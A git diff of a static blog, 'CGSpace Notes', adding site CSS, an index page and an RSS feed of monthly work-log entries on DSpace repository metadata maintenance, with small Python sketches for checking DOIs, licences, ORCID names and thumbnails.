rem!important}.pl-md-5,.px-md-5{padding-left
:3rem!important}.m-md-n1{margin:-.25rem!important}.mt-md-n1,.my-md-n1{margin-top:-.25rem!important}.mr-md-n1,.mx-md-n1{margin-right:-.25rem!important}.mb-md-n1,.my-md-n1{margin-bottom:-.25rem!important}.ml-md-n1,.mx-md-n1{margin-left:-.25rem!important}.m-md-n2{margin:-.5rem!important}.mt-md-n2,.my-md-n2{margin-top:-.5rem!important}.mr-md-n2,.mx-md-n2{margin-right:-.5rem!important}.mb-md-n2,.my-md-n2{margin-bottom:-.5rem!important}.ml-md-n2,.mx-md-n2{margin-left:-.5rem!important}.m-md-n3{margin:-1rem!important}.mt-md-n3,.my-md-n3{margin-top:-1rem!important}.mr-md-n3,.mx-md-n3{margin-right:-1rem!important}.mb-md-n3,.my-md-n3{margin-bottom:-1rem!important}.ml-md-n3,.mx-md-n3{margin-left:-1rem!important}.m-md-n4{margin:-1.5rem!important}.mt-md-n4,.my-md-n4{margin-top:-1.5rem!important}.mr-md-n4,.mx-md-n4{margin-right:-1.5rem!important}.mb-md-n4,.my-md-n4{margin-bottom:-1.5rem!important}.ml-md-n4,.mx-md-n4{margin-left:-1.5rem!important}.m-md-n5{margin:-3rem!important}.mt-md-n5,.my-md-n5{margin-top:-3rem!important}.mr-md-n5,.mx-md-n5{margin-right:-3rem!important}.mb-md-n5,.my-md-n5{margin-bottom:-3rem!important}.ml-md-n5,.mx-md-n5{margin-left:-3rem!important}.m-md-auto{margin:auto!important}.mt-md-auto,.my-md-auto{margin-top:auto!important}.mr-md-auto,.mx-md-auto{margin-right:auto!important}.mb-md-auto,.my-md-auto{margin-bottom:auto!important}.ml-md-auto,.mx-md-auto{margin-left:auto!important}}@media (min-width:992px){.m-lg-0{margin:0!important}.mt-lg-0,.my-lg-0{margin-top:0!important}.mr-lg-0,.mx-lg-0{margin-right:0!important}.mb-lg-0,.my-lg-0{margin-bottom:0!important}.ml-lg-0,.mx-lg-0{margin-left:0!important}.m-lg-1{margin:.25rem!important}.mt-lg-1,.my-lg-1{margin-top:.25rem!important}.mr-lg-1,.mx-lg-1{margin-right:.25rem!important}.mb-lg-1,.my-lg-1{margin-bottom:.25rem!important}.ml-lg-1,.mx-lg-1{margin-left:.25rem!important}.m-lg-2{margin:.5rem!important}.mt-lg-2,.my-lg-2{margin-top:.5rem!important}.mr-lg-2,.mx-lg-2{margin-right:.5rem!important}.mb-lg-2,.my-lg-2{margin-bottom:.5rem!important}.ml-lg-2,.mx-lg-2{margin-left:.5rem!important}.m-lg-3{margin:1rem!important}.mt-lg-3,.my-lg-3{margin-top:1rem!important}.mr-lg-3,.mx-lg-3{margin-right:1rem!important}.mb-lg-3,.my-lg-3{margin-bottom:1rem!important}.ml-lg-3,.mx-lg-3{margin-left:1rem!important}.m-lg-4{margin:1.5rem!important}.mt-lg-4,.my-lg-4{margin-top:1.5rem!important}.mr-lg-4,.mx-lg-4{margin-right:1.5rem!important}.mb-lg-4,.my-lg-4{margin-bottom:1.5rem!important}.ml-lg-4,.mx-lg-4{margin-left:1.5rem!important}.m-lg-5{margin:3rem!important}.mt-lg-5,.my-lg-5{margin-top:3rem!important}.mr-lg-5,.mx-lg-5{margin-right:3rem!important}.mb-lg-5,.my-lg-5{margin-bottom:3rem!important}.ml-lg-5,.mx-lg-5{margin-left:3rem!important}.p-lg-0{padding:0!important}.pt-lg-0,.py-lg-0{padding-top:0!important}.pr-lg-0,.px-lg-0{padding-right:0!important}.pb-lg-0,.py-lg-0{padding-bottom:0!important}.pl-lg-0,.px-lg-0{padding-left:0!important}.p-lg-1{padding:.25rem!important}.pt-lg-1,.py-lg-1{padding-top:.25rem!important}.pr-lg-1,.px-lg-1{padding-right:.25rem!important}.pb-lg-1,.py-lg-1{padding-bottom:.25rem!important}.pl-lg-1,.px-lg-1{padding-left:.25rem!important}.p-lg-2{padding:.5rem!important}.pt-lg-2,.py-lg-2{padding-top:.5rem!important}.pr-lg-2,.px-lg-2{padding-right:.5rem!important}.pb-lg-2,.py-lg-2{padding-bottom:.5rem!important}.pl-lg-2,.px-lg-2{padding-left:.5rem!important}.p-lg-3{padding:1rem!important}.pt-lg-3,.py-lg-3{padding-top:1rem!important}.pr-lg-3,.px-lg-3{padding-right:1rem!important}.pb-lg-3,.py-lg-3{padding-bottom:1rem!important}.pl-lg-3,.px-lg
-3{padding-left:1rem!important}.p-lg-4{padding:1.5rem!important}.pt-lg-4,.py-lg-4{padding-top:1.5rem!important}.pr-lg-4,.px-lg-4{padding-right:1.5rem!important}.pb-lg-4,.py-lg-4{padding-bottom:1.5rem!important}.pl-lg-4,.px-lg-4{padding-left:1.5rem!important}.p-lg-5{padding:3rem!important}.pt-lg-5,.py-lg-5{padding-top:3rem!important}.pr-lg-5,.px-lg-5{padding-right:3rem!important}.pb-lg-5,.py-lg-5{padding-bottom:3rem!important}.pl-lg-5,.px-lg-5{padding-left:3rem!important}.m-lg-n1{margin:-.25rem!important}.mt-lg-n1,.my-lg-n1{margin-top:-.25rem!important}.mr-lg-n1,.mx-lg-n1{margin-right:-.25rem!important}.mb-lg-n1,.my-lg-n1{margin-bottom:-.25rem!important}.ml-lg-n1,.mx-lg-n1{margin-left:-.25rem!important}.m-lg-n2{margin:-.5rem!important}.mt-lg-n2,.my-lg-n2{margin-top:-.5rem!important}.mr-lg-n2,.mx-lg-n2{margin-right:-.5rem!important}.mb-lg-n2,.my-lg-n2{margin-bottom:-.5rem!important}.ml-lg-n2,.mx-lg-n2{margin-left:-.5rem!important}.m-lg-n3{margin:-1rem!important}.mt-lg-n3,.my-lg-n3{margin-top:-1rem!important}.mr-lg-n3,.mx-lg-n3{margin-right:-1rem!important}.mb-lg-n3,.my-lg-n3{margin-bottom:-1rem!important}.ml-lg-n3,.mx-lg-n3{margin-left:-1rem!important}.m-lg-n4{margin:-1.5rem!important}.mt-lg-n4,.my-lg-n4{margin-top:-1.5rem!important}.mr-lg-n4,.mx-lg-n4{margin-right:-1.5rem!important}.mb-lg-n4,.my-lg-n4{margin-bottom:-1.5rem!important}.ml-lg-n4,.mx-lg-n4{margin-left:-1.5rem!important}.m-lg-n5{margin:-3rem!important}.mt-lg-n5,.my-lg-n5{margin-top:-3rem!important}.mr-lg-n5,.mx-lg-n5{margin-right:-3rem!important}.mb-lg-n5,.my-lg-n5{margin-bottom:-3rem!important}.ml-lg-n5,.mx-lg-n5{margin-left:-3rem!important}.m-lg-auto{margin:auto!important}.mt-lg-auto,.my-lg-auto{margin-top:auto!important}.mr-lg-auto,.mx-lg-auto{margin-right:auto!important}.mb-lg-auto,.my-lg-auto{margin-bottom:auto!important}.ml-lg-auto,.mx-lg-auto{margin-left:auto!important}}@media 
(min-width:1200px){.m-xl-0{margin:0!important}.mt-xl-0,.my-xl-0{margin-top:0!important}.mr-xl-0,.mx-xl-0{margin-right:0!important}.mb-xl-0,.my-xl-0{margin-bottom:0!important}.ml-xl-0,.mx-xl-0{margin-left:0!important}.m-xl-1{margin:.25rem!important}.mt-xl-1,.my-xl-1{margin-top:.25rem!important}.mr-xl-1,.mx-xl-1{margin-right:.25rem!important}.mb-xl-1,.my-xl-1{margin-bottom:.25rem!important}.ml-xl-1,.mx-xl-1{margin-left:.25rem!important}.m-xl-2{margin:.5rem!important}.mt-xl-2,.my-xl-2{margin-top:.5rem!important}.mr-xl-2,.mx-xl-2{margin-right:.5rem!important}.mb-xl-2,.my-xl-2{margin-bottom:.5rem!important}.ml-xl-2,.mx-xl-2{margin-left:.5rem!important}.m-xl-3{margin:1rem!important}.mt-xl-3,.my-xl-3{margin-top:1rem!important}.mr-xl-3,.mx-xl-3{margin-right:1rem!important}.mb-xl-3,.my-xl-3{margin-bottom:1rem!important}.ml-xl-3,.mx-xl-3{margin-left:1rem!important}.m-xl-4{margin:1.5rem!important}.mt-xl-4,.my-xl-4{margin-top:1.5rem!important}.mr-xl-4,.mx-xl-4{margin-right:1.5rem!important}.mb-xl-4,.my-xl-4{margin-bottom:1.5rem!important}.ml-xl-4,.mx-xl-4{margin-left:1.5rem!important}.m-xl-5{margin:3rem!important}.mt-xl-5,.my-xl-5{margin-top:3rem!important}.mr-xl-5,.mx-xl-5{margin-right:3rem!important}.mb-xl-5,.my-xl-5{margin-bottom:3rem!important}.ml-xl-5,.mx-xl-5{margin-left:3rem!important}.p-xl-0{padding:0!important}.pt-xl-0,.py-xl-0{padding-top:0!important}.pr-xl-0,.px-xl-0{padding-right:0!important}.pb-xl-0,.py-xl-0{padding-bottom:0!important}.pl-xl-0,.px-xl-0{padding-left:0!important}.p-xl-1{padding:.25rem!important}.pt-xl-1,.py-xl-1{padding-top:.25rem!important}.pr-xl-1,.px-xl-1{padding-right:.25rem!important}.pb-xl-1,.py-xl-1{padding-bottom:.25rem!important}.pl-xl-1,.px-xl-1{padding-left:.25rem!important}.p-xl-2{padding:.5rem!important}.pt-xl-2,.py-xl-2{padding-top:.5rem!important}.pr-xl-2,.px-xl-2{padding-right:.5rem!important}.pb-xl-2,.py-xl-2{padding-bottom:.5rem!important}.pl-xl-2,.px-xl-2{padding-left:.5rem!important}.p-xl-3{padding:1rem!important}.pt-xl-3,.py-xl-3{padding-top:1rem!important}.pr-xl-3,.px-xl-3{padding-right:1rem!important}.pb-xl-3,.py-xl-3{padding-bottom:1rem!important}.pl-xl-3,.px-xl-3{padding-left:1rem!important}.p-xl-4{padding:1.5rem!important}.pt-xl-4,.py-xl-4{padding-top:1.5rem!important}.pr-xl-4,.px-xl-4{padding-right:1.5rem!important}.pb-xl-4,.py-xl-4{padding-bottom:1.5rem!important}.pl-xl-4,.px-xl-4{padding-left:1.5rem!important}.p-xl-5{padding:3rem!important}.pt-xl-5,.py-xl-5{padding-top:3rem!important}.pr-xl-5,.px-xl-5{padding-right:3rem!important}.pb-xl-5,.py-xl-5{padding-bottom:3rem!important}.pl-xl-5,.px-xl-5{padding-left:3rem!important}.m-xl-n1{margin:-.25rem!important}.mt-xl-n1,.my-xl-n1{margin-top:-.25rem!important}.mr-xl-n1,.mx-xl-n1{margin-right:-.25rem!important}.mb-xl-n1,.my-xl-n1{margin-bottom:-.25rem!important}.ml-xl-n1,.mx-xl-n1{margin-left:-.25rem!important}.m-xl-n2{margin:-.5rem!important}.mt-xl-n2,.my-xl-n2{margin-top:-.5rem!important}.mr-xl-n2,.mx-xl-n2{margin-right:-.5rem!important}.mb-xl-n2,.my-xl-n2{margin-bottom:-.5rem!important}.ml-xl-n2,.mx-xl-n2{margin-left:-.5rem!important}.m-xl-n3{margin:-1rem!important}.mt-xl-n3,.my-xl-n3{margin-top:-1rem!important}.mr-xl-n3,.mx-xl-n3{margin-right:-1rem!important}.mb-xl-n3,.my-xl-n3{margin-bottom:-1rem!important}.ml-xl-n3,.mx-xl-n3{margin-left:-1rem!important}.m-xl-n4{margin:-1.5rem!important}.mt-xl-n4,.my-xl-n4{margin-top:-1.5rem!important}.mr-xl-n4,.mx-xl-n4{margin-right:-1.5rem!important}.mb-xl-n4,.my-xl-n4{margin-bottom:-1.5rem!important}.ml-xl-n4,.mx-xl-n4{margin-left:-1.5rem!important}.m-xl-n5{marg
in:-3rem!important}.mt-xl-n5,.my-xl-n5{margin-top:-3rem!important}.mr-xl-n5,.mx-xl-n5{margin-right:-3rem!important}.mb-xl-n5,.my-xl-n5{margin-bottom:-3rem!important}.ml-xl-n5,.mx-xl-n5{margin-left:-3rem!important}.m-xl-auto{margin:auto!important}.mt-xl-auto,.my-xl-auto{margin-top:auto!important}.mr-xl-auto,.mx-xl-auto{margin-right:auto!important}.mb-xl-auto,.my-xl-auto{margin-bottom:auto!important}.ml-xl-auto,.mx-xl-auto{margin-left:auto!important}}.stretched-link::after{position:absolute;top:0;right:0;bottom:0;left:0;z-index:1;pointer-events:auto;content:"";background-color:rgba(0,0,0,0)}.text-monospace{font-family:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace!important}.text-justify{text-align:justify!important}.text-wrap{white-space:normal!important}.text-nowrap{white-space:nowrap!important}.text-truncate{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.text-left{text-align:left!important}.text-right{text-align:right!important}.text-center{text-align:center!important}@media (min-width:576px){.text-sm-left{text-align:left!important}.text-sm-right{text-align:right!important}.text-sm-center{text-align:center!important}}@media (min-width:768px){.text-md-left{text-align:left!important}.text-md-right{text-align:right!important}.text-md-center{text-align:center!important}}@media (min-width:992px){.text-lg-left{text-align:left!important}.text-lg-right{text-align:right!important}.text-lg-center{text-align:center!important}}@media (min-width:1200px){.text-xl-left{text-align:left!important}.text-xl-right{text-align:right!important}.text-xl-center{text-align:center!important}}.text-lowercase{text-transform:lowercase!important}.text-uppercase{text-transform:uppercase!important}.text-capitalize{text-transform:capitalize!important}.font-weight-light{font-weight:300!important}.font-weight-lighter{font-weight:lighter!important}.font-weight-normal{font-weight:400!important}.font-weight-bold{font-weight:700!important}.font-weight-bolder{font-weight:bolder!important}.font-italic{font-style:italic!important}.text-white{color:#fff!important}.text-primary{color:#007bff!important}a.text-primary:focus,a.text-primary:hover{color:#0056b3!important}.text-secondary{color:#6c757d!important}a.text-secondary:focus,a.text-secondary:hover{color:#494f54!important}.text-success{color:#28a745!important}a.text-success:focus,a.text-success:hover{color:#19692c!important}.text-info{color:#17a2b8!important}a.text-info:focus,a.text-info:hover{color:#0f6674!important}.text-warning{color:#ffc107!important}a.text-warning:focus,a.text-warning:hover{color:#ba8b00!important}.text-danger{color:#dc3545!important}a.text-danger:focus,a.text-danger:hover{color:#a71d2a!important}.text-light{color:#f8f9fa!important}a.text-light:focus,a.text-light:hover{color:#cbd3da!important}.text-dark{color:#343a40!important}a.text-dark:focus,a.text-dark:hover{color:#121416!important}.text-body{color:#212529!important}.text-muted{color:#6c757d!important}.text-black-50{color:rgba(0,0,0,.5)!important}.text-white-50{color:rgba(255,255,255,.5)!important}.text-hide{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0}.text-decoration-none{text-decoration:none!important}.text-break{word-break:break-word!important;word-wrap:break-word!important}.text-reset{color:inherit!important}.visible{visibility:visible!important}.invisible{visibility:hidden!important}@media 
print{*,::after,::before{text-shadow:none!important;box-shadow:none!important}a:not(.btn){text-decoration:underline}abbr[title]::after{content:" (" attr(title) ")"}pre{white-space:pre-wrap!important}blockquote,pre{border:1px solid #adb5bd;page-break-inside:avoid}img,tr{page-break-inside:avoid}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}@page{size:a3}body{min-width:992px!important}.container{min-width:992px!important}.navbar{display:none}.badge{border:1px solid #000}.table{border-collapse:collapse!important}.table td,.table th{background-color:#fff!important}.table-bordered td,.table-bordered th{border:1px solid #dee2e6!important}.table-dark{color:inherit}.table-dark tbody+tbody,.table-dark td,.table-dark th,.table-dark thead th{border-color:#dee2e6}.table .thead-dark th{color:inherit;border-color:#dee2e6}}@media (min-width:48em){html{font-size:18px}}body{color:#555}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{font-weight:400;color:#333}.h1 a,.h1 a:focus,.h1 a:hover,.h2 a,.h2 a:focus,.h2 a:hover,.h3 a,.h3 a:focus,.h3 a:hover,.h4 a,.h4 a:focus,.h4 a:hover,.h5 a,.h5 a:focus,.h5 a:hover,.h6 a,.h6 a:focus,.h6 a:hover,h1 a,h1 a:focus,h1 a:hover,h2 a,h2 a:focus,h2 a:hover,h3 a,h3 a:focus,h3 a:hover,h4 a,h4 a:focus,h4 a:hover,h5 a,h5 a:focus,h5 a:hover,h6 a,h6 a:focus,h6 a:hover{color:inherit;text-decoration:none}.container{max-width:60rem}.blog-masthead{margin-bottom:3rem;background-color:#428bca;-webkit-box-shadow:inset 0 -.1rem .25rem rgba(0,0,0,.1);box-shadow:inset 0 -.1rem .25rem rgba(0,0,0,.1)}.nav-link{position:relative;padding:1rem;font-weight:500;color:#cdddeb}.nav-link:focus,.nav-link:hover{color:#fff;background-color:transparent}.nav-link.active{color:#fff}.nav-link.active:after{position:absolute;bottom:0;left:50%;width:0;height:0;margin-left:-.3rem;vertical-align:middle;content:"";border-right:.3rem solid transparent;border-bottom:.3rem solid;border-left:.3rem solid transparent}.blog-header{padding-bottom:1.25rem;margin-bottom:2rem;border-bottom:.05rem solid #eee}.blog-title{margin-bottom:0;font-size:2rem;font-weight:400}.blog-description{font-size:1.1rem;color:#999}@media (min-width:40em){.blog-title{font-size:3.5rem}}.sidebar-module{padding:1rem}.sidebar-module-inset{padding:1rem;background-color:#f5f5f5;border-radius:.25rem}.sidebar-module-inset ol:last-child,.sidebar-module-inset p:last-child,.sidebar-module-inset ul:last-child{margin-bottom:0}.blog-pagination{margin-bottom:4rem}.blog-pagination>.btn{border-radius:2rem}.blog-post{margin-bottom:4rem}.blog-post-title{margin-bottom:.25rem;font-size:2.5rem}.blog-post-meta{margin-bottom:1.25rem;color:#999}article img{max-width:100%;height:auto;margin:13px auto}.sharing-icons .nav-item+.nav-item{margin-left:1rem}section+#disqus_thread{margin-top:1rem}article blockquote{margin-bottom:1rem;font-size:1.25rem}article div.highlight{padding:5px 5px 0 5px}.blog-footer{padding:2.5rem 0;color:#999;text-align:center;background-color:#f9f9f9;border-top:.05rem solid #e5e5e5}.blog-footer p:last-child{margin-bottom:0} \ No newline at end of file diff --git a/docs/index.html b/docs/index.html new file mode 100644 index 000000000..eb8e1d5ac --- /dev/null +++ b/docs/index.html @@ -0,0 +1,440 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
CGSpace Notes

Documenting day-to-day work on the CGSpace repository.

July, 2023

2023-07-01: Export CGSpace to check for missing Initiative collection mappings. Start harvesting on AReS.

2023-07-02: Minor edits to the `crossref_doi_lookup.py` script while running some checks from 22,000 CGSpace DOIs.

2023-07-03: I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect, so I took the more accurate ones from Crossref and updated the items on CGSpace, and took a few hundred ISBNs as well for where we were missing them. I also tagged ~4,700 items with missing licenses as “Copyrighted; all rights reserved” based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer. Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it’s usually copyrighted (it could still be open access, but we can’t tell via Crossref). I would be curious to write a script to check the Unpaywall API for open access status (see the sketch below); in the past I found that their license status was not very accurate, but the open access status might be more reliable. More minor work on the DSpace 7 item views: I learned some new Angular template syntax, created a custom component to show Creative Commons licenses on the simple item page, and decided that I don’t like the Impact Area icons as a component because they don’t have any visual meaning.
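Since the note above only mentions being curious about such a script, here is a minimal sketch of what an Unpaywall open access check might look like, assuming a plain text file with one DOI per line; the file name and contact email are placeholders and this is not an actual CGSpace script.

```python
#!/usr/bin/env python3
# Sketch: look up open access status for a list of DOIs via the Unpaywall API
# (https://api.unpaywall.org/v2/{doi}?email=...). The input file name and the
# contact email are placeholders.

import csv
import sys

import requests

EMAIL = "you@example.org"  # Unpaywall expects a contact email on every request

def oa_status(doi: str) -> dict:
    r = requests.get(f"https://api.unpaywall.org/v2/{doi}", params={"email": EMAIL}, timeout=30)
    if r.status_code != 200:
        return {"doi": doi, "is_oa": "", "oa_status": f"HTTP {r.status_code}"}
    data = r.json()
    return {"doi": doi, "is_oa": data.get("is_oa"), "oa_status": data.get("oa_status")}

if __name__ == "__main__":
    writer = csv.DictWriter(sys.stdout, fieldnames=["doi", "is_oa", "oa_status"])
    writer.writeheader()
    with open("dois.txt") as f:
        for line in f:
            if line.strip():
                writer.writerow(oa_status(line.strip()))
```

Unpaywall's `oa_status` values (gold, hybrid, green, bronze, closed) would be straightforward to compare against the license guesses derived from Crossref.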
June, 2023

2023-06-02

- Spend some time testing my `post_bitstreams.py` script to update thumbnails for items on CGSpace
  - Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail… (see the sketch below)
- Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace
  - They have experience with improving the MODS interface in MELSpace’s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace
  - From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk
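On spotting those odd thumbnail formats: a rough sketch like the one below could classify downloaded thumbnail files by their leading bytes, so JFIF and WebP ones stand out from plain JPEG or PNG. The directory name is a placeholder, not part of the original workflow.

```python
#!/usr/bin/env python3
# Sketch: identify thumbnail file formats by magic bytes. The "thumbnails"
# directory is a placeholder for wherever the bitstreams were downloaded.

from pathlib import Path

def sniff(path: Path) -> str:
    header = path.read_bytes()[:12]
    if header.startswith(b"\xff\xd8\xff") and header[6:10] == b"JFIF":
        return "JPEG (JFIF)"
    if header.startswith(b"\xff\xd8\xff"):
        return "JPEG"
    if header.startswith(b"RIFF") and header[8:12] == b"WEBP":
        return "WebP"
    if header.startswith(b"\x89PNG"):
        return "PNG"
    return "unknown"

if __name__ == "__main__":
    for f in sorted(Path("thumbnails").iterdir()):
        if f.is_file():
            print(f"{f.name}: {sniff(f)}")
```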
May, 2023

2023-05-03

- Alliance’s TIP team emailed me to ask about issues authenticating on CGSpace
  - It seems their password expired, which is annoying
- I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week
  - There are many of our subjects that would match if they added a “-” like “high yielding varieties” or used singular… (see the sketch below)
  - Also I found at least two spelling mistakes, for example “decison support systems”, which would match if it was spelled correctly
- Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace
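To make the hyphenation and singular/plural near-misses easier to spot, a sketch like the one below could normalize both lists before comparing them. The two input files (CGSpace subjects and AGROVOC terms, one per line) are assumptions about how the exports might be laid out, and the singularization is deliberately naive.

```python
#!/usr/bin/env python3
# Sketch: find CGSpace subjects that would match AGROVOC terms if hyphens and
# trailing plurals were ignored. Input file names are placeholders.

def normalize(term: str) -> str:
    term = term.strip().lower().replace("-", " ")
    # naive singularization, just enough to catch "varieties" vs "variety" etc.
    if term.endswith("ies"):
        term = term[:-3] + "y"
    elif term.endswith("s") and not term.endswith("ss"):
        term = term[:-1]
    return " ".join(term.split())

def load(path: str) -> dict:
    with open(path) as f:
        return {normalize(line): line.strip() for line in f if line.strip()}

if __name__ == "__main__":
    subjects = load("cgspace-subjects.txt")
    agrovoc = load("agrovoc-terms.txt")
    for norm, original in sorted(subjects.items()):
        if norm in agrovoc and original.lower() != agrovoc[norm].lower():
            print(f"near match: {original!r} ~ {agrovoc[norm]!r}")
```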
April, 2023

2023-04-02

- Run all system updates on CGSpace and reboot it
- I exported CGSpace to CSV to check for any missing Initiative collection mappings
  - I also did a check for missing country/region mappings with csv-metadata-quality (see the sketch below)
- Start a harvest on AReS
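csv-metadata-quality does the country/region check for real; the sketch below is only a stripped-down illustration of the idea: flag rows whose countries imply a UN M.49 region that is not present in the region column. The CSV column names and the tiny country-to-region table are illustrative assumptions, not the tool's actual implementation.

```python
#!/usr/bin/env python3
# Sketch of a "missing region" check on a CGSpace CSV export: if an item has a
# country whose UN M.49 region is not listed in its regions, report it.
# Column names and the small lookup table are illustrative only.

import csv

COUNTRY_TO_REGION = {
    "Kenya": "Eastern Africa",
    "Nigeria": "Western Africa",
    "India": "Southern Asia",
    "Peru": "South America",
}

def check(csv_path: str) -> None:
    with open(csv_path, newline="") as f:
        for row in csv.DictReader(f):
            countries = [c.strip() for c in row.get("cg.coverage.country", "").split("||") if c.strip()]
            regions = {r.strip() for r in row.get("cg.coverage.region", "").split("||") if r.strip()}
            for country in countries:
                expected = COUNTRY_TO_REGION.get(country)
                if expected and expected not in regions:
                    print(f"{row.get('id', '?')}: {country} present but region {expected} missing")

if __name__ == "__main__":
    check("cgspace-export.csv")
```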
March, 2023

2023-03-01

- Remove `cg.subject.wle` and `cg.identifier.wletheme` from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)
- iso-codes 4.13.0 was released, which incorporates my changes to the common names for Iran, Laos, and Syria
- I finally got through with porting the input form from DSpace 6 to DSpace 7
February, 2023

2023-02-01

- Export CGSpace to cross check the DOI metadata with Crossref
  - I want to try to expand my use of their data to journals, publishers, volumes, issues, etc… (see the sketch below)
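As a minimal sketch of what pulling those extra bibliographic fields from the Crossref REST API could look like for a single DOI: the endpoint and field names follow Crossref's works schema, but the output shape and the mailto address are placeholders, not the actual CGSpace tooling.

```python
#!/usr/bin/env python3
# Sketch: fetch journal, publisher, volume, and issue for one DOI from the
# Crossref REST API (https://api.crossref.org/works/{doi}). The mailto address
# is a placeholder used for Crossref's "polite pool".

import sys

import requests

def crossref_bibliography(doi: str) -> dict:
    r = requests.get(
        f"https://api.crossref.org/works/{doi}",
        params={"mailto": "you@example.org"},
        timeout=30,
    )
    r.raise_for_status()
    message = r.json()["message"]
    container_titles = message.get("container-title", [])
    return {
        "doi": doi,
        "journal": container_titles[0] if container_titles else "",
        "publisher": message.get("publisher", ""),
        "volume": message.get("volume", ""),
        "issue": message.get("issue", ""),
    }

if __name__ == "__main__":
    # Pass a DOI on the command line, for example: ./crossref-bib.py 10.xxxx/xxxx
    print(crossref_bibliography(sys.argv[1]))
```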
January, 2023

2023-01-01

- Apply some more ORCID identifiers to items on CGSpace using my `2022-09-22-add-orcids.csv` file
  - I want to update all ORCID names and refresh them in the database (see the sketch below)
  - I see we have some new ones that aren’t in our list if I combine with this file:
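On refreshing ORCID names: the public ORCID API exposes the current display name for an iD, so a sketch like the one below could rebuild a name list from a file of iDs. The input file name and output format are placeholders, and this is not the actual resolve script used for CGSpace.

```python
#!/usr/bin/env python3
# Sketch: look up the current public name for each ORCID iD using the public
# ORCID API (https://pub.orcid.org/v3.0/{orcid}/person). Input file is a placeholder.

import requests

def orcid_name(orcid: str) -> str:
    r = requests.get(
        f"https://pub.orcid.org/v3.0/{orcid}/person",
        headers={"Accept": "application/json"},
        timeout=30,
    )
    r.raise_for_status()
    name = r.json().get("name") or {}
    given = (name.get("given-names") or {}).get("value", "")
    family = (name.get("family-name") or {}).get("value", "")
    return f"{family}, {given}".strip(", ")

if __name__ == "__main__":
    with open("orcid-ids.txt") as f:
        for line in f:
            orcid = line.strip()
            if orcid:
                print(f"{orcid_name(orcid)}: {orcid}")
```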
December, 2022

2022-12-01

- Fix some incorrect regions on CGSpace
  - I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions
- Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!
- Replace “East Asia” with “Eastern Asia” region on CGSpace (UN M.49 region; see the sketch below)
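A label swap like “East Asia” to “Eastern Asia” boils down to rewriting one column of a CSV export so the change can be re-imported as a metadata update. The sketch below shows the idea; the file names are placeholders and the column name is an assumption about the export layout (language qualifiers like `[en_US]` would change it).

```python
#!/usr/bin/env python3
# Sketch: replace one region label with another in a CGSpace CSV export so the
# change can be re-imported as a metadata update. File names and the column
# name are assumptions.

import csv

OLD, NEW = "East Asia", "Eastern Asia"
COLUMN = "cg.coverage.region"

with open("export.csv", newline="") as src, open("export-fixed.csv", "w", newline="") as dst:
    reader = csv.DictReader(src)
    writer = csv.DictWriter(dst, fieldnames=reader.fieldnames)
    writer.writeheader()
    for row in reader:
        values = [v.strip() for v in row.get(COLUMN, "").split("||") if v.strip()]
        row[COLUMN] = "||".join(NEW if v == OLD else v for v in values)
        writer.writerow(row)
```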
November, 2022

2022-11-01

- Last night I re-synced DSpace 7 Test from CGSpace
  - I also updated all my local `7_x-dev` branches on the latest upstreams
- I spent some time updating the authorizations in Alliance collections
  - I want to make sure they use groups instead of individuals where possible!
- I reverted the Cocoon autosave change because it was more of a nuisance (it meant Peter can’t upload CSVs from the web interface) than it was worth for such a very low severity security issue
+ + + + + + + + + diff --git a/docs/index.xml b/docs/index.xml new file mode 100644 index 000000000..5258126b3 --- /dev/null +++ b/docs/index.xml @@ -0,0 +1,1907 @@ + + + + CGSpace Notes + https://alanorth.github.io/cgspace-notes/ + Recent content on CGSpace Notes + Hugo -- gohugo.io + en-us + Sat, 01 Jul 2023 17:14:36 +0300 + + July, 2023 + https://alanorth.github.io/cgspace-notes/2023-07/ + Sat, 01 Jul 2023 17:14:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-07/ + 2023-07-01 Export CGSpace to check for missing Initiative collection mappings Start harvesting on AReS 2023-07-02 Minor edits to the crossref_doi_lookup.py script while running some checks from 22,000 CGSpace DOIs 2023-07-03 I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect I took the more accurate ones from Crossref and updated the items on CGSpace I took a few hundred ISBNs as well for where we were missing them I also tagged ~4,700 items with missing licenses as &ldquo;Copyrighted; all rights reserved&rdquo; based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it&rsquo;s usually copyrighted (could still be open access, but we can&rsquo;t tell via Crossref) I would be curious to write a script to check the Unpaywall API for open access status&hellip; In the past I found that their license status was not very accurate, but the open access status might be more reliable More minor work on the DSpace 7 item views I learned some new Angular template syntax I created a custom component to show Creative Commons licenses on the simple item page I also decided that I don&rsquo;t like the Impact Area icons as a component because they don&rsquo;t have any visual meaning + + + + June, 2023 + https://alanorth.github.io/cgspace-notes/2023-06/ + Fri, 02 Jun 2023 10:29:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-06/ + <h2 id="2023-06-02">2023-06-02</h2> +<ul> +<li>Spend some time testing my <code>post_bitstreams.py</code> script to update thumbnails for items on CGSpace +<ul> +<li>Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail&hellip;</li> +</ul> +</li> +<li>Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace +<ul> +<li>They have experience with improving the MODS interface in MELSpace&rsquo;s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace</li> +<li>From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch 